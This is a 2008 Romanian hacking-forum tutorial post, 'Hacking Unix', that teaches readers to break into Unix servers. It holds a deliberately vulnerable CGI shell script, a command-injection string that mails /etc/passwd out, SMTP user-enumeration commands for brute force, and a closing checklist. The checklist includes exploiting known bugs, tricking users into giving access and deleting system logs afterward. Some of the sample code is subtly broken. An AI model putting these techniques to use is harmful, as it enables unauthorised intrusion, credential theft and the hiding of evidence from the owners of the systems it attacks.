... PredatoR. ZaPTo.orG ...
Doriti să reactionati la acest mesaj? Creati un cont în câteva clickuri sau conectati-vă pentru a continua.

... PredatoR. ZaPTo.orG ...

PredatoR.malware-site.www The BesT Server !
 
AcasaUltimele imaginiCăutareÎnregistrareConectare

 

 Hacking Unix

In jos 
AutorMesaj





Data de înscriere : 01/01/1970

Hacking Unix Empty
MesajSubiect: Hacking Unix   Hacking Unix I_icon_minitimeDum Sept 14, 2008 3:44 pm

Inainte de a prezenta principalele tehnici de hack a SO Unix va
trebui sa cititi ghidul de instalare Linux.Apoi ca sa va familiarizati
cu comenzile linux..Acum putem intra in amanunte.


a)FTP


Dupa cum probabil cunoasteti deja ftp este un program cu ajutorul
caruia puteti transfera fisiere intre calculatorul dumneavoastra
si server.Acest utilitar este foarte folositor in momentul cand
avem un cont local pe un anumit server sau cand serverul permite
comexiuni anonime folosind perechile username:parola urmatoare
annonymous:adresa_de mail sau ftp:guest.O conexiune ftp se poate
stabili tastand 'ftp server.com' in casuta Start/Run,unde server.
com este serverul la care doriti sa va conectati.In cazul unui
atac efectiv asupra unui server,ftp-ul este folosit in combinatie
cu telnetul.


b)TELNET


Telnetul este un utilitar care ne permite sa ne conectam la orice
port deschis de pe un server si sa dam comenzi daemonului care
asculta pe acel port.Mai jos o sa dau o lista cu porturile si
serviciile cele mai frecvent utilizate:


port 21: ftp
port 22: SSH


port 23: telnet


port 25: SMTP


port 110: POP3


port 80: server web


port 111: NFS(Network File System)


port 139: SMB(Server Message Block)


port 6667: IRC(Internet Relay Chat)




Evident,fiecare daemon are un numar limitat de comenzi.Spre exemplu
daca portul 23 este deschis,atunci daemonul telnet este activ si
putem realiza o conexiune pe acel port numai daca avem drept de
utilizator pe acel server.Dupa ce conexiunea este stabilita putem
da comenzi unix pe server.Putem folosi acest lucru pentru a obtine
controlul pe serverul respectiv.Cititi acest material pentru a vedea
care sunt principalele tehnici si exploituri.Daca portul 80 este
deschis atunci ne putem conecta pe acel port iar cand conexiunea
este stabilita putem da comanda GET index.html.Ca raspuns vom primi
pagina principala.Daca nu aveti posibilitatea sa instalati linux
pe calculatorul personal atunci puteti folosi un shell acount,adica
un cont unix pus la dispozitie de un furnizor de astfel de servicii.
Aici puteti gasi unul.


c)PORT SCANNING


Pentru a vedea ce servicii ruleaza pe un server se foloseste scanarea
porturilor.Astfel de programe se numesc scannere.Unele scannere sunt
foarte complexe,acestea verificand si vulnerabilitatile cunoscute.
Scannerele sunt concepute pentru diferite sisteme de operare.Pentru
Windows: fscan,portscan,IIS scanner,Cerberus.Pentru Unix: SATAN,
Strobe,Jakal,etc.Pentru scanarea porturilor eu folosesc JAKAL
deoarece este invizibil adica nu lasa nici o urma de conexiune
in log-uri.Ca scanner de vulnerabilitati folosesc SATAN.Verificati
sectiunea LINKURI pentru a vedea unde puteti gasi aceste scannere.


d)CGI SCANNING


Atacurile asupra CGI sunt foarte populare si 65% dintre ele sunt
incununate de succes.In prezent exista peste 500 de vulnerabilitati
cunoscute.Un scanner foarte bun este Cgifound.exe.O sa dau un mic
exemplu ca sa intelegeti despre ce este vorba.De exemplu daca pe un
server NT exista fisierul /test/test.cgi puteti afla calea fizica
a serverului folosind urmatorul link:www.server.com/cgi-bin/test/test.
cgi.Daca vreti mai multe detalii cititi aici.Sa presupunem ca sunteti
administrator de retea si trebuie sa scrieti un script pentru un motor
de cautare pentru site-ul dvs.Un exemplu foarte simplu este urmatorul
:


--------------------------------------------------------------


#/bin/bash


$a=grep $valoare_introdusa /usl/local/fisier.txt


echo $a fis.txt


cat fis.txt


rm fis.txt


--------------------------------------------------------------


Valoare_introdusa este valoarea introdusa de utilizator.Acesta este
cautata intr-un anumit fisier stabilit dinainte cu inregistrari,
toate referirile la ea sunt stocate in fis.txt,sunt afisate pe ecran
iar apoi fis.txt este sters.Toate bune daca utilizatorul este de
buna credinta.El poate introduce urmatorul sir:


blabla;mail E-mail </etc/passwd


Acest sir are ca efect cautarea sirului blabla in fisier iar apoi
trimiterea la adresa mea a fisierului /etc/passwd.Asta deoarece
unixul accepta executia de comenzi una dupa alta folosind
metacaractere.De exemplu:


grep root /etc/passwd;echo a doua comanda;ls -ld /tmp;rlogin -l
username hostname


Toate aceste comenzi sunt executate una dupa alta.Sper ca v-ati
facut o mica idee despre ce inseamna vulnerabilitatea in CGI.Va
recomand niste scannere cum ar fi Cgifound.exe si cgiS.c


e)BUFFER OVERFLOW


Ce inseamna de fapt buffer overflow?Umplerea unei zone de memorie
alocata unor anumiti operanzi,operatori,instructiuni sau date.Cum
se foloseste aceasta tehnica la obtinerea controlului asupra unui
server?Serverul preia niste date de la utilizator si le executa.De
exemplu GET cgi-bin/file.pl este o instructiune pe care noi o
transmitem iar serverul o executa.Daca nu este specificat in codul
sursa controlul asupra dimensiunii instructiunii respective,atunci
datele care sunt in plus se executa aleator(ele sunt interpretate
ca instructiuni).Aceste tipuri de exploturi sunt de obicei programe
in C pe care le compilam pe masina noastra unix cu comanda 'gcc
fisier.c -o fisierexecuatbil' si apoi il rulam cu parametrii stabiliti.
Daca sunteti buni programatori in C puteti adapta programul respectiv
sa ruleze in Windows.Tehnica este extrem de folositoare deoarece in
majoritatea cazurilor nu puteti obtine controlul cu ajutorul
tehnicilor obisnuite.Cum gasiti astfel de programe?Tastati in browser
adresa unei liste de securitate,de exemplu www.freshmeat.net iar
apoi intorduceti in caseta de text(motor de cautare) versiunea
serverului care va intereseaza.De exemplu eu a trebuit sa testez
recent vulnerabilitatea unui sistem pe care rula ProFtpd 1.2.0,asa
ca am introdus in motorul de cautare 'proftpd' si am gasit un astfel
de exploit care odata compilat pe o platforma FreeBSD si rulat cu
parametrii corespunzatori permitea unui atacator sa incarce fisierele
/etc/passwd si /etc/shadow ducand astfel la compromiterea sistemului.
Desigur,abonarea la o lista de securitate e o idee buna atat pentru
un administrator cat si pentru un hacker.


f)BRUTE FORCE


Aceasta tehnica este folositoare in cazul in care obtinem o lista cu
toti utilizatorii.Se stie ca multi utilizatori au aceeasi parola ca
si username-ul.Sau unele parole sunt de genul username100 sau
username urmat de un numar.La inceput si eu foloseam asemenea parole
.Prima mea parola era nebunu45.Cel mai bun program de brute force
pentru Windows este Brutus.exe.Verificati sectiunea de linkuri.Am
facut un program care se conecta pe portul 25 al unui server si
lua prin brute force toti userii.Ia incercati o conexiune telnet
pe portul 25 al unui server de mail si dati urmatoarele comenzi:


helo mail
mail from:webmaster
rcpt to:adresa_ta
data
urmeaza textul mesajului
.
quit


Daca adresa introdusa la "rcpt to" era corecta primeati un raspuns
de genul "Recipient Ok",daca nu primeati ceva de genul "User unknown".
Faceti un program care sa citeasca raspunsul serverului folosind un
fisier de useri.Hackul implica inventivitate si imaginatie, iar
tehnicile folosite difera de la caz la caz,de la server la server.


g)Recapitulare


Voi prezenta principalele etape pe care trebuie sa le parcurgeti
pentru a obtine controlul asupra unui server sub UNIX:


1)adunati informatii (versiuni de server web,ftp,telnet,sendmail,etc)
cu ajutorul telnetului si a unui program de scanare a porturilor


2)scanati bug-urile in CGI,bineinteles dupa ce verificati ca exista
directorul cgi-bin pe server.


3)incercati toate exploiturile cunoscute pentru cazul respectiv si
pentu versiunile de servicii care ruleaza pe porturile deschise.


4)Daca nimic nu merge,incercati sa obtineti un cont local,eventual
pacalind un utilizator sa va dea acces.Astfel puteti verifica mai
indeaproape serverul.


5)Dupa ce obtineti controlul stergeti toate jurnalele.De exemplu
puteti sterge /var/adm/messages si/sau /usr/local/httpd/logs.Am dat
un exemplu,acestea difera in functie de SO folosit.
Sus In jos
 
Hacking Unix
Sus 
Pagina 1 din 1

Permisiunile acestui forum:Nu puteti raspunde la subiectele acestui forum
... PredatoR. ZaPTo.orG ... :: .... HACKING ZONE ... :: >TUTORIALS>>>-
Mergi direct la: